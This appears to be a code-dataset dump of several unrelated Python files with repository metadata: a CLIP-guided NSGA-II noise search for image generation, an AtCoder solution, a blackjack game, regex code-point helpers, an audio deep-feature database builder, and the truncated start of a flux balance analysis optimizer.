        raise Exception('Only pressure=2 allowed for binary tournament!')
    # Fix: np.int was removed in NumPy 1.24+; the builtin int is the alias target.
    S = np.full(n_tournaments, -1, dtype=int)
    for i in range(n_tournaments):
        a, b = P[i]
        # minimization: the competitor with the smaller objective sum wins
        if np.sum(pop[a].F) < np.sum(pop[b].F):
            S[i] = a
        else:
            S[i] = b
    return S
def text_texts_sim(txt = '',memory = None,pick_num = 10):
    """Rank stored prompts in *memory* by CLIP text similarity to *txt*.

    Returns (top_prob, top_txt): softmax probabilities and prompt strings of
    the (at most *pick_num*) most similar memory entries.
    """
    scores = []
    device = 'cuda:0'
    clip_model, _ = clip.load(dis_model_name, device=device,jit=False)
    clip_model = clip_model.eval()
    txt_fts = get_txt_fts(txt = txt,model = clip_model)
    txt_fts = txt_fts.detach().cpu().numpy().flatten()
    for mem in memory:
        ts_fts = get_txt_fts(txt = mem['txt'],model = clip_model)
        ts_fts = ts_fts.detach().cpu().numpy().flatten()
        sim = cosine_similarity(txt_fts,ts_fts)
        scores.append(sim)
    # softmax over raw similarities turns them into a probability ranking
    scores = torch.Tensor(scores)
    probabilities = torch.nn.functional.softmax(scores, dim=0)
    top_prob,top_id = torch.topk(probabilities, min(pick_num,len(probabilities)))
    top_txt = []
    for ids in top_id:
        top_txt.append(memory[ids]['txt'])
    return top_prob,top_txt
def noise_memory(txt = '',pop = None,pick = False):
    """Build an initial noise population of shape (pop, 512).

    Memorised noise vectors for prompts similar to *txt* are reused where
    possible; any shortfall is filled from a standard normal distribution.
    With ``pick=True`` a single similarity-weighted blend of the matching
    memories is returned instead (shape (512,)).
    """
    memory_file = 'noise_memory.json'
    noises = []
    cnt = 0
    # No memory yet: fall back to a purely random population.
    if not os.path.exists(memory_file):
        return np.random.normal(loc=0.0, scale=1.0, size=(pop, 512))
    with open(memory_file, 'r+') as f:
        memory = json.load(f)
        if len(memory) <= 0:
            return np.random.normal(loc=0.0, scale=1.0, size=(pop, 512))
        prob, txts = text_texts_sim(txt, memory, pick_num=pop//2)
        prob = torch.nn.functional.softmax(prob, dim=0)
        coff = dict(zip(txts, prob))
        if pick == True:
            # Similarity-weighted blend of every matching memorised noise.
            noise = 0
            for mem in memory:
                if mem['txt'] in txts:
                    noise += coff[mem['txt']] * torch.Tensor(mem['noise'])
            return noise.numpy()
        elif pick == False:
            for mem in memory:
                if cnt >= pop:
                    break
                if mem['txt'] in txts:
                    # Keep only memories whose weight beats the uniform share.
                    if coff[mem['txt']] >= 1/(len(prob)):
                        noises.append(mem['noise'])
                        cnt += 1
            noises = np.array(noises)
            length = len(noises)
            print('memory reuse : \nnoise memory : {} , normal distribution : {}'.format(len(noises), pop-len(noises)))
            if length == 0:
                return np.random.normal(loc=0.0, scale=1.0, size=(pop, 512))
            if pop > length:
                # Pad the reused noises with fresh random samples.
                noises = np.concatenate((noises, np.random.normal(loc=0.0, scale=1.0, size=(pop-length, 512))), axis=0)
            return noises
    # NOTE: the original trailing ``f.close()`` sat after the return
    # statements (unreachable) and was redundant under ``with``; removed.
def make_memory(txt = '',noise = None):
    """Persist *noise* for prompt *txt* in the JSON noise memory.

    An existing entry for the same prompt is replaced only when the new
    noise scores better (text-image + image-real + text-label) than the
    stored one; unseen prompts are appended.
    """
    memory_file = 'noise_memory.json'
    with open(memory_file, 'r+') as f:
        listobj = json.load(f)
    with open(memory_file, 'w') as f:
        found = False
        for obj in listobj:
            if obj['txt'] == txt:
                noise_ori = np.array(obj['noise'])
                tis1, irs1, _, tls1 = get_score_from_noises(txt=txt, noises=torch.from_numpy(noise.reshape((1, 512))))
                tis2, irs2, _, tls2 = get_score_from_noises(txt=txt, noises=torch.from_numpy(noise_ori.reshape((1, 512))))
                if tis1[0]+irs1[0]+tls1[0] > tis2[0]+irs2[0]+tls2[0]:
                    # BUG FIX: store a plain list -- an ndarray is not JSON
                    # serializable and json.dump below would raise.
                    obj['noise'] = list(noise)
                # BUG FIX: mark the prompt as found even when the stored
                # noise wins, otherwise a duplicate entry was appended.
                found = True
                break
        if found == False:
            listobj.append({'txt': txt, 'noise': list(noise)})
        json.dump(listobj, f, indent=4, separators=(',',': '))
def noise_perturbation(noise = None,level = 0.01):
    # Placeholder: presumably intended to jitter *noise* by a small factor
    # ``level``, but never implemented and never called in this script.
    pass
def get_fes(txt = '',pop = 100,ofs = 100,gen = 50):
    """Run NSGA-II and return feasible latent-noise solutions for *txt*.

    *pop* is the population size, *ofs* the offspring count and *gen*
    the generation cap.  Objective values are z-score normalised in place
    and the Pareto front is saved to ``front.png``.
    """
    algorithm = NSGA2(
        pop_size = pop,
        n_offsprings = ofs,
        # sampling: reuse memorised noises, falling back to N(0, 1)
        sampling = noise_memory(txt = txt,pop = pop),
        selection = get_selection('tournament',pressure = 2, func_comp = binary_tournament),
        crossover = get_crossover('real_sbx'),
        mutation = get_mutation('real_pm',eta=15, prob=1.0),
        #eliminate_duplicates=True
    )
    problem = MyProblem(txt)
    # termination setting
    termination = MultiObjectiveDefaultTermination(
        x_tol=1e-8,
        cv_tol=1e-6,
        f_tol=0.0025,
        nth_gen=5,
        n_last=30,
        n_max_gen=gen,
        # BUG FIX: this previously read ``pop + gan * ofs`` -- ``gan`` is
        # undefined anywhere and raised a NameError at run time.
        n_max_evals=pop + gen * ofs
    )
    # minimize the problem (objectives are negated scores, so this maximises)
    res = minimize(
        problem,
        algorithm,
        termination,
        seed=1,
        # custom progress display
        display=MyDisplay(),
        verbose=True
    )
    # z-score normalisation of the objective values (needs >= 2 points)
    if len(res.F) >= 2:
        mean = np.mean(res.F, axis = 0)
        std = np.std(res.F, axis = 0)
        for i in range(len(res.F)):
            res.F[i] = (res.F[i] - mean)/std
    # draw the Pareto front
    plot = Scatter()
    plot.add(problem.pareto_front(), plot_type="line", color="black", alpha=0.7)
    plot.add(res.F, color="red")
    plot.save('front.png')
    return res
def mcdm(res = None):
    """Pick one compromise solution from the Pareto set via ASF decomposition.

    Objectives are min-max normalised, weighted (text-image, image-real,
    text-label), and the index of the best point is returned.
    """
    F = res.F
    ideal = F.min(axis=0)
    nadir = F.max(axis=0)
    nF = (F - ideal) / (nadir - ideal)
    # relative importance of the three objectives
    weights = np.array([0.30, 0.40, 0.30])
    I = get_decomposition("asf").do(nF, 1/weights).argmin()
    print("Best regarding decomposition: Point {} - {}".format(I, -F[I]))
    return I
def ploter(score = None):
    """Scatter-plot every ordered pair of objectives into ``pareto_front/``.

    *score* is an (n_points, n_objectives) array of minimisation values;
    they are negated back to positive scores before plotting.
    """
    labels = {0: 'text_image', 1: 'image_real', 2: 'text_label'}
    # one row per objective, flipped back to positive scores
    score = -score.transpose()
    if not os.path.exists('pareto_front/'):
        os.mkdir('pareto_front/')
    n_objective = len(score)
    for i in range(n_objective):
        for j in range(n_objective):
            if i == j:
                continue
            plt.clf()
            plt.title('{} v.s {}'.format(labels[i], labels[j]))
            plt.plot(score[i], score[j], 'bo')
            plt.xlabel('{} score'.format(labels[i]))
            plt.ylabel('{} score'.format(labels[j]))
            plt.grid(True)
            plt.savefig('pareto_front/{}-{}.png'.format(labels[i], labels[j]))
def region_word_loss(txt = None,img = None):
    """Compute the attention word loss between image regions and words.

    The image is tiled into a grid with one row/column per word token and
    every region embedding is matched against every word embedding.

    NOTE(review): the feature arrays come straight from get_txt_fts /
    get_img_fts; their exact shapes are not visible here -- confirm before
    relying on the reshape calls below.
    """
    device = 'cuda:0'
    clip_model, preprocess = clip.load(dis_model_name, device=device, jit=False)
    clip_model = clip_model.eval()
    txt_list = re.split('; |, | |\n', txt)
    M = img.shape[0]//len(txt_list)
    N = img.shape[1]//len(txt_list)
    region_list = [img[x:x+M, y:y+N] for x in range(0, img.shape[0], M) for y in range(0, img.shape[1], N)]
    word_fts_list = []
    region_fts_list = []
    # BUG FIX: the original iterated ``range(<list>)`` (a TypeError) and was
    # missing the colon on the second loop header (a SyntaxError).
    for ts in txt_list:
        word_fts_list.append(get_txt_fts(txt=ts, model=clip_model))
    for rs in region_list:
        region_fts_list.append(get_img_fts(img=rs, model=clip_model, preprocess=preprocess))
    word_fts_list = np.array(word_fts_list)
    region_fts_list = np.array(region_fts_list)
    # NOTE(review): ndarray.reshape returns a new array, so these two calls
    # have no effect as written -- confirm the intended shapes.
    word_fts_list.reshape((1, -1))
    region_fts_list.reshape((1, -1))
    max_len = len(txt_list)
    loss, _, _ = attention_lib.word_loss(region_fts_list, word_fts_list, max_len)
    print(loss)
    return loss
if __name__ == '__main__':
    # Command-line driver: either run the NSGA-II search (-r) or simply
    # generate and score a batch of images for the given prompt.
    parser = argparse.ArgumentParser()
    # whether to run the feasible-solution search or not
    parser.add_argument('-r', '--run', action='store_true', default=False)
    # prompt text
    parser.add_argument('-t', '--text', type=str, default='a dog lying on an orange couch in the living room.')
    # number of images for plain generation mode
    parser.add_argument('-n', '--num', type=int, default=10)
    # number of images to pick
    parser.add_argument('-p', '--pick', type=int, default=1)
    # search settings string: "<pop> <ofs> <gen>"
    parser.add_argument('-s', '--set', type=str, default='1 1 1')
    # draw the Pareto-front plots
    parser.add_argument('-d', '--draw', action='store_true', default=False)
    # persist the best noise in the memory file
    parser.add_argument('-m', '--save_mem', action='store_true', default=False)
    args = parser.parse_args()
    # split the settings string into population / offspring / generations
    set_list = args.set.split()
    pop = int(set_list[0])
    ofs = int(set_list[1])
    gen = int(set_list[2])
    t = Timer()
    txt = args.text
    # BUG FIX: use makedirs(..., exist_ok=True) so a missing parent
    # 'image_result' directory no longer raises FileNotFoundError.
    os.makedirs('image_result/{}'.format(txt), exist_ok=True)
    path = 'image_result/{}/noise.txt'.format(txt)
    f = open(path, 'w')
    print('generate text = {}'.format(txt))
    # run the feasible-solution search
    if args.run == True:
        print('find fes : pop = {} , ofs = {} , gen = {}'.format(pop, ofs, gen))
        res = get_fes(txt=txt, pop=pop, ofs=ofs, gen=gen)
        # draw pareto front
        if args.draw == True:
            ploter(res.F)
        # Multi-Criteria Decision Making: pick one compromise solution
        best_res_id = mcdm(res)
        gen_from_noises(txt=txt, noises=np.array([res.X[best_res_id]]), name='best_pick')
        # store the winning noise for future reuse
        if args.save_mem == True:
            make_memory(txt=txt, noise=res.X[best_res_id])
    else:
        print('generate {} images'.format(args.num))
        gen_scored(txt=txt, image_n=args.num)
    t.print_time()
    f.close()
efc216ee5e2342ef95305d4f352d31660f7facd5 | 726 | py | Python | ABC145/ABC145c.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC145/ABC145c.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC145/ABC145c.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | # ABC145c
if __name__ == '__main__':
main()
| 21.352941 | 77 | 0.53168 | # ABC145c
def main():
import sys
import itertools
import math
input = sys.stdin.readline
sys.setrecursionlimit(10**6)
# map(int,input().split())
n = int(input())
town = [tuple(map(int, input().split())) for _ in range(n)]
ans = 0
def kyori(pos1, pos2):
return math.sqrt((pos1[0] - pos2[0]) ** 2 + (pos1[1] - pos2[1]) ** 2)
def permutations_count(n, r):
return math.factorial(n) // math.factorial(n - r)
for i in itertools.permutations(town, n):
# print(i)
t = 0
for j in range(1, n):
t += kyori(i[j - 1], i[j])
# print(t)
ans += t
print(ans/math.factorial(n))
if __name__ == '__main__':
main()
| 652 | 0 | 23 |
4fa93a39bffc9c6d90b2d240bb9e747e50e4cc00 | 4,269 | py | Python | blackjack.py | Alfredooe/twoplayerblackjack | 738858edd68b7de1834e53f86487e560bb9ed038 | [
"Unlicense"
] | null | null | null | blackjack.py | Alfredooe/twoplayerblackjack | 738858edd68b7de1834e53f86487e560bb9ed038 | [
"Unlicense"
] | null | null | null | blackjack.py | Alfredooe/twoplayerblackjack | 738858edd68b7de1834e53f86487e560bb9ed038 | [
"Unlicense"
] | null | null | null | #'random' library import
import random
#rank list & suit dictionary
cardranks = ["Clubs", "Diamonds", "Hearts", "Spades"]
cardsuits = {"Ace":11, "One":1, "Two":2, "Three":3, "Four":4, "Five":5, "Six":6, "Seven":7, "Eight":8, "Nine":9, "Ten":10, "Jack":10, "Queen":10, "King":10}
#player class w/ public attributes
#deck class generates every possible card within the deck, appending each possiblity to a list
#dealing method assigns a random card at the beginning to each player
#card class
#return string representation, nice way of doing this.
#Input verification and looping to ensure correct input
#lol
#player name input request
player1 = Player(input("Player 1, enter your name. : "))
player2 = Player(input("Player 2, enter your name. : "))
#deck object is formed
deck = Deck()
print(f"I will now deal your initial cards, {player1.name} and {player2.name}.\n")
#first 2 random cards are generated for both players
deck.deal(player1)
deck.deal(player2)
print(f"Good luck, players.\n")
while True:
turn(player1)
turn(player2)
#!!!!!!!!!Adjust the code so that player has a hand object instead of player having a list for cards.!!!!!!!!!
#Settings n getters
| 33.351563 | 156 | 0.585383 | #'random' library import
import random
#rank list & suit dictionary
cardranks = ["Clubs", "Diamonds", "Hearts", "Spades"]
cardsuits = {"Ace":11, "One":1, "Two":2, "Three":3, "Four":4, "Five":5, "Six":6, "Seven":7, "Eight":8, "Nine":9, "Ten":10, "Jack":10, "Queen":10, "King":10}
#player class w/ public attributes
class Player:
    """A blackjack participant: name, dealt cards, stick flag and score."""
    def __init__(self, name):
        self.name = name        # display name
        self.hand = []          # Card objects dealt so far
        self.stuck = False      # True once the player chooses to stick
        self.score = 0          # running blackjack total
#deck class generates every possible card within the deck, appending each possiblity to a list
class Deck:
    """A 52-card deck built from the module-level rank/suit tables."""
    def __init__(self):
        # Cartesian product of every rank name with every suit name.
        # (Note: the module's ``cardsuits`` dict holds rank names/values
        # and ``cardranks`` holds suit names -- the two are swapped.)
        self.cards = [Card(rank, suit) for rank in cardsuits for suit in cardranks]
    def deal(self, player):
        """Deal one random card to *player*, update their score, and
        remove the card from the deck."""
        card = random.choice(self.cards)
        print(f"{player.name}, you've been dealt card {card} with a value of {card.value}")
        player.hand.append(card)
        if card.value == 11:
            # Ace: count as 11 unless that could bust, otherwise as 1.
            if player.score <= 10:
                player.score = player.score + 11
            else:
                player.score = player.score + 1
        else:
            player.score = player.score + card.value
        self.cards.remove(card)
        return card
#card class
class Card:
    """A single playing card; its blackjack value comes from ``cardsuits``."""
    def __init__(self, r, s):
        self.rank = r                       # rank name, e.g. "Ace"
        self.suit = s                       # suit name, e.g. "Hearts"
        self.value = cardsuits[self.rank]   # blackjack point value
    def __str__(self):
        # Human-readable form, e.g. "Ace of Hearts".
        return f"{self.rank} of {self.suit}"
#Input verification and looping to ensure correct input
def inputhandler(task, player):
    """Prompt *player* and loop until a valid 'T' or 'S' answer is given.

    *task* selects the prompt wording: "norm" for twist/stick, "ace" for
    the ace-value question.  Input is upper-cased before validation.
    """
    if task == "norm":
        print(f"{player.name}, T for twist or S for stick. : ")
    elif task == "ace":
        print(f"{player.name}, you've been dealt an ace! T for a value of 11 or S for 1 : ")
    while True:
        answer = input().upper()
        if answer in ("T", "S"):
            return answer
        print("Invalid input. Please re-enter.")
def turn(player):
    """Play one turn for *player*; end the game when both players have
    stuck or someone busts.

    Relies on the module-level ``player1``, ``player2`` and ``deck``.
    """
    # BUG FIX: the original condition ``player1.stuck == True & player2.stuck == True``
    # only worked by accident of chained comparison (``&`` binds tighter
    # than ``==``); a plain ``and`` expresses the intent directly.
    if player1.stuck and player2.stuck:
        # Both stuck: compare scores and declare the outcome.
        if player1.score > player2.score:
            print(f"Congratulations {player1.name}, you won!")
            gameover()
        elif player1.score < player2.score:
            print(f"Congratulations {player2.name}, you won!")
            gameover()
        elif player1.score == player2.score:
            print(f"Congratulations i guess, you managed to come a draw.")
            gameover()
    elif player.stuck:
        # This player already stuck; nothing to do this turn.
        return
    else:
        move = inputhandler("norm", player)
        # player choosing to stick
        if move == "S":
            player.stuck = True
        # player choosing to twist
        elif move == "T":
            card = deck.deal(player)
            if player.score > 21:
                # Bust: a score above 21 loses immediately.
                print(f"{player.name}. You went over 21, with a score of {player.score}, You lost!")
                gameover()
            else:
                print(f"{player.name}, you've now got a score of {player.score}.\n")
#lol
def gameover():
    """Terminate the game by raising SystemExit.

    The original called ``quit()``, a site-module convenience intended only
    for interactive sessions; raising SystemExit (which is what ``quit()``
    does under the hood) is the reliable equivalent in a script.
    """
    raise SystemExit
# --- Interactive game driver (runs at import; blocks on input()) ---
# Ask both players for their names.
player1 = Player(input("Player 1, enter your name. : "))
player2 = Player(input("Player 2, enter your name. : "))
# Build the 52-card deck.
deck = Deck()
print(f"I will now deal your initial cards, {player1.name} and {player2.name}.\n")
# Deal one opening card to each player (note: only one card each, not two).
deck.deal(player1)
deck.deal(player2)
print(f"Good luck, players.\n")
# Alternate turns forever; the loop ends when turn() calls gameover(),
# which raises SystemExit.
while True:
    turn(player1)
    turn(player2)
#!!!!!!!!!Adjust the code so that player has a hand object instead of player having a list for cards.!!!!!!!!!
#Settings n getters
| 2,819 | -28 | 275 |
4c41018a3dbac3faca5ec4517af07bfca312b2a0 | 3,685 | py | Python | elementpath/regex/codepoints.py | sissaschool/elementpath | a74ce89c04622d8ae98ab739886c3e46f87b024e | [
"MIT"
] | 21 | 2019-10-02T18:36:16.000Z | 2022-03-14T15:46:00.000Z | elementpath/regex/codepoints.py | sissaschool/elementpath | a74ce89c04622d8ae98ab739886c3e46f87b024e | [
"MIT"
] | 32 | 2019-08-28T13:04:16.000Z | 2021-12-16T17:05:49.000Z | elementpath/regex/codepoints.py | sissaschool/elementpath | a74ce89c04622d8ae98ab739886c3e46f87b024e | [
"MIT"
] | 9 | 2019-08-28T11:24:49.000Z | 2022-01-12T23:53:28.000Z | #
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module defines Unicode code points helper functions.
"""
from sys import maxunicode
from typing import Iterable, Iterator, Optional, Set, Tuple, Union
CHARACTER_CLASS_ESCAPED: Set[int] = {ord(c) for c in r'-|.^?*+{}()[]\\'}
"""Code Points of escaped chars in a character class."""
CodePoint = Union[int, Tuple[int, int]]
def code_point_order(cp: CodePoint) -> int:
    """Ordering key: an int is its own key, a range sorts by its start."""
    if isinstance(cp, int):
        return cp
    return cp[0]
def code_point_reverse_order(cp: CodePoint) -> int:
    """Reverse ordering key: a range sorts by its last contained point."""
    if isinstance(cp, int):
        return cp
    return cp[1] - 1
def iter_code_points(code_points: Iterable[CodePoint], reverse=False) -> Iterator[CodePoint]:
    """
    Iterates a code points sequence, merging consecutive code points
    into ranges.

    :param code_points: an iterable with code points and code point ranges.
    :param reverse: if `True` reverses the order of the sequence.
    :return: yields code points or code point ranges.
    """
    # Sort keys are inlined equivalents of code_point_order /
    # code_point_reverse_order.
    if reverse:
        ordered = sorted(code_points, reverse=True,
                         key=lambda x: x if isinstance(x, int) else x[1] - 1)
    else:
        ordered = sorted(code_points,
                         key=lambda x: x if isinstance(x, int) else x[0])

    lo = hi = 0  # pending merged range [lo, hi); hi == 0 means "none yet"
    for item in ordered:
        rng = (item, item + 1) if isinstance(item, int) else item
        if not hi:
            lo, hi = rng
            continue
        if reverse:
            # Extend the pending range downwards while items touch it.
            if lo <= rng[1]:
                lo = min(lo, rng[0])
                continue
        elif hi >= rng[0]:
            # Extend the pending range upwards while items touch it.
            hi = max(hi, rng[1])
            continue
        # Disjoint item: flush the pending range (a 1-point span collapses
        # back to a bare code point).
        yield (lo, hi) if hi > lo + 1 else lo
        lo, hi = rng
    if hi:
        yield (lo, hi) if hi > lo + 1 else lo
def get_code_point_range(cp: CodePoint) -> Optional[CodePoint]:
    """
    Returns a code point range.

    :param cp: a single code point or a code point range.
    :return: a code point range or `None` if the argument is not a \
    code point or a code point range.
    """
    if isinstance(cp, int):
        return (cp, cp + 1) if 0 <= cp <= maxunicode else None
    try:
        start, end = cp[0], cp[1]
    except (IndexError, TypeError):
        return None
    if isinstance(start, int) and isinstance(end, int) \
            and 0 <= start < end <= maxunicode + 1:
        return cp
    return None
def code_point_repr(cp: CodePoint) -> str:
    """
    Returns the string representation of a code point.

    :param cp: an integer or a tuple with at least two integers. \
    Values must be in interval [0, sys.maxunicode].
    """
    def escaped(code: int) -> str:
        # Backslash-escape characters with a special meaning in a class.
        return r'\%s' % chr(code) if code in CHARACTER_CLASS_ESCAPED else chr(code)

    if isinstance(cp, int):
        return escaped(cp)
    start, end = cp[0], cp[1] - 1  # the right bound of a range is inclusive
    if end > start + 1:
        return '%s-%s' % (escaped(start), escaped(end))
    return escaped(start) + escaped(end)
| 29.717742 | 93 | 0.609227 | #
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module defines Unicode code points helper functions.
"""
from sys import maxunicode
from typing import Iterable, Iterator, Optional, Set, Tuple, Union
CHARACTER_CLASS_ESCAPED: Set[int] = {ord(c) for c in r'-|.^?*+{}()[]\\'}
"""Code Points of escaped chars in a character class."""
CodePoint = Union[int, Tuple[int, int]]
def code_point_order(cp: CodePoint) -> int:
    """Ordering key: an int is its own key, a range sorts by its start."""
    if isinstance(cp, int):
        return cp
    return cp[0]
def code_point_reverse_order(cp: CodePoint) -> int:
    """Reverse ordering key: a range sorts by its last contained point."""
    if isinstance(cp, int):
        return cp
    return cp[1] - 1
def iter_code_points(code_points: Iterable[CodePoint], reverse=False) -> Iterator[CodePoint]:
    """
    Iterates a code points sequence, merging consecutive code points
    into ranges.

    :param code_points: an iterable with code points and code point ranges.
    :param reverse: if `True` reverses the order of the sequence.
    :return: yields code points or code point ranges.
    """
    # Sort keys are inlined equivalents of code_point_order /
    # code_point_reverse_order.
    if reverse:
        ordered = sorted(code_points, reverse=True,
                         key=lambda x: x if isinstance(x, int) else x[1] - 1)
    else:
        ordered = sorted(code_points,
                         key=lambda x: x if isinstance(x, int) else x[0])

    lo = hi = 0  # pending merged range [lo, hi); hi == 0 means "none yet"
    for item in ordered:
        rng = (item, item + 1) if isinstance(item, int) else item
        if not hi:
            lo, hi = rng
            continue
        if reverse:
            # Extend the pending range downwards while items touch it.
            if lo <= rng[1]:
                lo = min(lo, rng[0])
                continue
        elif hi >= rng[0]:
            # Extend the pending range upwards while items touch it.
            hi = max(hi, rng[1])
            continue
        # Disjoint item: flush the pending range (a 1-point span collapses
        # back to a bare code point).
        yield (lo, hi) if hi > lo + 1 else lo
        lo, hi = rng
    if hi:
        yield (lo, hi) if hi > lo + 1 else lo
def get_code_point_range(cp: CodePoint) -> Optional[CodePoint]:
    """
    Returns a code point range.

    :param cp: a single code point or a code point range.
    :return: a code point range or `None` if the argument is not a \
    code point or a code point range.
    """
    if isinstance(cp, int):
        return (cp, cp + 1) if 0 <= cp <= maxunicode else None
    try:
        start, end = cp[0], cp[1]
    except (IndexError, TypeError):
        return None
    if isinstance(start, int) and isinstance(end, int) \
            and 0 <= start < end <= maxunicode + 1:
        return cp
    return None
def code_point_repr(cp: CodePoint) -> str:
    """
    Returns the string representation of a code point.

    :param cp: an integer or a tuple with at least two integers. \
    Values must be in interval [0, sys.maxunicode].
    """
    def escaped(code: int) -> str:
        # Backslash-escape characters with a special meaning in a class.
        return r'\%s' % chr(code) if code in CHARACTER_CLASS_ESCAPED else chr(code)

    if isinstance(cp, int):
        return escaped(cp)
    start, end = cp[0], cp[1] - 1  # the right bound of a range is inclusive
    if end > start + 1:
        return '%s-%s' % (escaped(start), escaped(end))
    return escaped(start) + escaped(end)
| 0 | 0 | 0 |
136655a1d66ff352e8605dae58e21ef5325cc3a5 | 2,834 | py | Python | deep_audio_features/bin/deep_retrieval_build_db.py | nikosmichas/deep_audio_features | ad45cd5681e1550481fdd10064ad2371b39ac05f | [
"MIT"
] | 40 | 2020-07-24T17:09:44.000Z | 2022-02-26T10:22:12.000Z | deep_audio_features/bin/deep_retrieval_build_db.py | nikosmichas/deep_audio_features | ad45cd5681e1550481fdd10064ad2371b39ac05f | [
"MIT"
] | 40 | 2020-07-20T17:21:20.000Z | 2022-01-28T23:02:07.000Z | deep_audio_features/bin/deep_retrieval_build_db.py | nikosmichas/deep_audio_features | ad45cd5681e1550481fdd10064ad2371b39ac05f | [
"MIT"
] | 5 | 2020-08-20T09:19:00.000Z | 2022-01-05T18:29:37.000Z | import argparse
import torch
from torch.utils.data import DataLoader
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../"))
from deep_audio_features.dataloading.dataloading import FeatureExtractorDataset
from deep_audio_features.lib.training import test
from deep_audio_features.utils.model_editing import drop_layers
from deep_audio_features.bin.basic_test import test_model
import deep_audio_features.bin.config
import os
import glob
import numpy as np
import pickle
if __name__ == '__main__':
# Read arguments
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model_dir', required=True,
type=str, help='Dir of models')
parser.add_argument('-i', '--input', required=True,
type=str, help='Input file for testing')
args = parser.parse_args()
model_dir = args.model_dir
ifile = args.input
compile_deep_database(ifile, model_dir, "db")
| 32.574713 | 84 | 0.659492 | import argparse
import torch
from torch.utils.data import DataLoader
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../"))
from deep_audio_features.dataloading.dataloading import FeatureExtractorDataset
from deep_audio_features.lib.training import test
from deep_audio_features.utils.model_editing import drop_layers
from deep_audio_features.bin.basic_test import test_model
import deep_audio_features.bin.config
import os
import glob
import numpy as np
import pickle
def load_models(models_path):
    """Return the paths of all '.pt' model files directly inside *models_path*."""
    return [os.path.join(models_path, entry)
            for entry in os.listdir(models_path)
            if entry.endswith(".pt")]
def get_meta_features(audio_file, list_of_models):
    """Run every CNN model on *audio_file* and collect posterior features.

    Returns a tuple of (averaged posteriors concatenated across models,
    per-model temporal posterior matrices, feature names for the averages).
    """
    # TODO add other layers
    layers_dropped = 0
    feature_names = []
    features_temporal = []
    features = np.array([])
    for model_path in list_of_models:
        _, posteriors = test_model(modelpath=model_path,
                                   ifile=audio_file,
                                   layers_dropped=layers_dropped,
                                   test_segmentation=True,
                                   verbose=True)
        # long-term average of the segment-level CNN posteriors
        averaged = np.mean(posteriors, axis=0)
        features = np.concatenate([features, averaged])
        base = os.path.basename(model_path).replace(".pt", "")
        feature_names += [f'{base}_{i}' for i in range(len(averaged))]
        # keep the whole temporal posterior sequence as well
        features_temporal.append(posteriors)
    return features, features_temporal, feature_names
def compile_deep_database(data_folder, models_folder, db_path):
    """Extract deep features for every wav in *data_folder* and pickle them.

    The pickle stores, in order: the averaged feature matrix, the temporal
    feature matrices, the feature names, the audio paths and the models dir.
    """
    audio_files = glob.glob(os.path.join(data_folder, '*.wav'))
    models = load_models(models_folder)
    all_features = []
    all_features_temporal = []
    for audio_path in audio_files:
        feats, feats_temporal, f_names = get_meta_features(audio_path, models)
        all_features.append(feats)
        all_features_temporal.append(np.concatenate(feats_temporal, axis=1).transpose())
    all_features = np.array(all_features)
    with open(db_path, 'wb') as handle:
        pickle.dump(all_features, handle)
        pickle.dump(all_features_temporal, handle)
        pickle.dump(f_names, handle)
        pickle.dump(audio_files, handle)
        pickle.dump(models_folder, handle)
    return
if __name__ == '__main__':
    # Read arguments
    parser = argparse.ArgumentParser()
    parser.add_argument('-m', '--model_dir', required=True,
                        type=str, help='Dir of models')
    # NOTE(review): despite the help text, this path is globbed for *.wav
    # files, i.e. it is a folder of audio files rather than a single file.
    parser.add_argument('-i', '--input', required=True,
                        type=str, help='Input file for testing')
    args = parser.parse_args()
    model_dir = args.model_dir
    ifile = args.input
    # Build the deep-feature database into the file "db".
    compile_deep_database(ifile, model_dir, "db")
| 1,778 | 0 | 69 |
cf3c76ac1491fa84c6c4aef6043115fded9327c2 | 15,383 | py | Python | v0.1/optim/optim.py | Chaowu88/etfba | bfba63685ca217937e32038cc55f530a4d980ad8 | [
"BSD-3-Clause"
] | null | null | null | v0.1/optim/optim.py | Chaowu88/etfba | bfba63685ca217937e32038cc55f530a4d980ad8 | [
"BSD-3-Clause"
] | null | null | null | v0.1/optim/optim.py | Chaowu88/etfba | bfba63685ca217937e32038cc55f530a4d980ad8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__ = 'Chao Wu'
R = 8.315e-3 # gas constant in kJ/mol/K
T = 298.15 # absolute temperature in K, or 25 C
K = 10000 # big enough constant
defaultMW = 40 # default enzyme molecular weight in kDa
defaultKcat = 200 # default reaction catalytic rate constant in 1/s
defaultKm = 0.2 # default reactant Michaelis constant in mM
maxIter = 100000
import re
import numpy as np
from pyomo.environ import (ConcreteModel, Set, Param, Var, Objective, Constraint, SolverFactory,
NonNegativeReals, Binary, value, maximize, minimize, log, exp)
from .result import FBAResults, TFBAResults, ETFBAResults
| 30.222004 | 159 | 0.726581 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__ = 'Chao Wu'
R = 8.315e-3 # gas constant in kJ/mol/K
T = 298.15 # absolute temperature in K, or 25 C
K = 10000 # big enough constant
defaultMW = 40 # default enzyme molecular weight in kDa
defaultKcat = 200 # default reaction catalytic rate constant in 1/s
defaultKm = 0.2 # default reactant Michaelis constant in mM
maxIter = 100000
import re
import numpy as np
from pyomo.environ import (ConcreteModel, Set, Param, Var, Objective, Constraint, SolverFactory,
NonNegativeReals, Binary, value, maximize, minimize, log, exp)
from .result import FBAResults, TFBAResults, ETFBAResults
class FBAOptimizer():
    # Builds and solves a flux balance analysis (FBA) LP with pyomo/GLPK:
